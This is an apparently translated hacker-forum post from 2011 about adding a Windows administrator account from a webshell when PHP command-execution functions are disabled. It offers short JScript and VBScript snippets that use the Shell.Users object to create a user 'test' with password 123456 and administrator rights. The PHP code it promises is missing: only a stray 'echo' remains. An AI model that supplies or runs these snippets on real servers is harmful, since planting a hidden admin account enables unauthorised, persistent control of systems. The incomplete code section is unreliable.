Author of the topic: CyberH4ck[南京Daddy]
Author: Nanquan Daddy Please indicate the source for reprinting hi.baidu.com/南京daddy
In 2009, LCX wrote the js version and vbs version of shell.users to add administrator accounts. Later I wanted to change it to the PHP version,
Because the code analysis is not accurate enough, I only wrote it out recently. When php executes the command functions such as exec, system, shell_exec, proc_open, passthru, popen
With the wscript.shell component disabled, this may be an opportunity.
The code is as follows:
echo "
The renderings are as follows:
The web server built by apache can be executed successfully. IIS seems to have insufficient permissions. The web server built by nginx and lighttpd has not been tested yet.
Here is the code for LCX
js:
var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;
vbs:
Set o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3
[This post was last edited by CyberH4ck on 2011-5-29 14:33]